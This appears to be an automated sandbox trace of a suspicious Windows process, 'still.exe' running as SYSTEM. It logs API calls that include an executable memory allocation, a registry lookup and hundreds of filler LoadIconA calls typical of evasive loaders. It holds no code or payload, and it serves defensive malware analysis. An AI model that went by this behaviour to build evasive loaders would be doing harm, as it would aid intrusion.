[0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe590, Length=0x28, ResultLength=0x0) [0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe590, Length=0x28, ResultLength=0x0) [0311.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe590, Length=0x28, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe590, Length=0x28, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe600, Length=0x28, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe760, Length=0x38, ResultLength=0x0) [0311.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x28, ResultLength=0x0) [0311.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x28, ResultLength=0x0) [0311.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe520, Length=0x20, ResultLength=0x0) [0311.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4a0, Length=0x20, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4a0, Length=0x20, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4a0, Length=0x20, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe760, Length=0x38, ResultLength=0x0) [0311.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe760, Length=0x38, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5e0, Length=0x20, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd7b0, Length=0x50, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd7b0, Length=0x50, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd7b0, Length=0x50, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd6a0, Length=0x50, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd6a0, Length=0x50, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0311.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fd6a0, Length=0x50, ResultLength=0x0) Thread: id = 534 os_tid = 0x13f0 Thread: id = 597 os_tid = 0x13b0 Process: id = "30" image_name = "trustedinstaller.exe" filename = "c:\\windows\\servicing\\trustedinstaller.exe" page_root = "0x6471000" os_pid = "0x12a4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\servicing\\TrustedInstaller.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:00099efb" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 483 os_tid = 0xf30 Thread: id = 484 os_tid = 0x1228 Thread: id = 485 os_tid = 0xa50 Thread: id = 486 os_tid = 0x900 Thread: id = 487 os_tid = 0x8f0 Thread: id = 488 os_tid = 0x12bc Thread: id = 489 os_tid = 0x12b8 Thread: id = 490 os_tid = 0x760 Process: id = "31" image_name = "still.exe" filename = "c:\\windows\\syswow64\\still.exe" page_root = "0x5c38b000" os_pid = "0xec4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\SysWOW64\\Still.exe -s" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 492 os_tid = 0xed0 [0149.468] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0149.910] GetUserNameA (in: lpBuffer=0x19ff10, pcbBuffer=0x19ff7c | out: lpBuffer="SYSTEM", pcbBuffer=0x19ff7c) returned 1 [0149.917] GetEnhMetaFileW (lpName="7589678967896789") returned 0x0 [0149.917] GetLastError () returned 0x2 [0149.918] LoadLibraryA (lpLibFileName="advapi32") returned 0x756e0000 [0149.918] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExA") returned 0x756ff020 [0149.918] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50d690 | out: phkResult=0x50d690*=0x1f0) returned 0x0 [0149.920] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0149.920] RegQueryValueExA (in: hKey=0x1f0, lpValueName="", lpReserved=0x0, lpType=0x19feb4, lpData=0x19fde8, lpcbData=0x50d368*=0xc8 | out: lpType=0x19feb4*=0x1, lpData="IEnumConnections", lpcbData=0x50d368*=0x11) returned 0x0 [0149.920] LoadLibraryA (lpLibFileName="kernel32") returned 0x772d0000 [0149.920] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0149.920] VirtualAlloc (lpAddress=0x0, dwSize=0xf200, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0149.921] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0149.921] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.921] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.921] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.921] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.922] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.923] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.924] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.925] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.926] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.927] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.928] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.929] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.930] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.931] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.966] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.966] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.966] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.966] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.966] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.967] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.968] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.969] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.970] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.971] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.992] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.993] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.994] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.995] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.996] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) returned 0x0 [0149.997] LoadIconA (hInstance=0x0, lpIconName=0x2516) 